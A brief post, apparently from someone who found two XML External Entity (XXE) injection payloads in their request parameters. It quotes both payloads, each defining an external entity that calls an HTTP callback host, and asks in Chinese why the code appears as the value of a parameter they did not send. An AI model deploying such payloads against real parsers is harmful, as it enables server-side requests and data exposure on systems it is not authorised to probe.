<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "http://10.150.71.21/facade/callback/callOne?info=task--542318__hash--c018c0d976d363452e1d1796dbbb36c9__type--309__para--userId__i--4__a=b" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "http://10.150.71.21/facade/callback/callOne?info=task--542318__hash--c018c0d976d363452e1d1796dbbb36c9__type--309__para--userId__i--4__a=b" >]>
&xxe;
这段代码,出现在不同的参数后面,变成para后面的那个参数的值,但我传的参数并不是这样的
&xxe;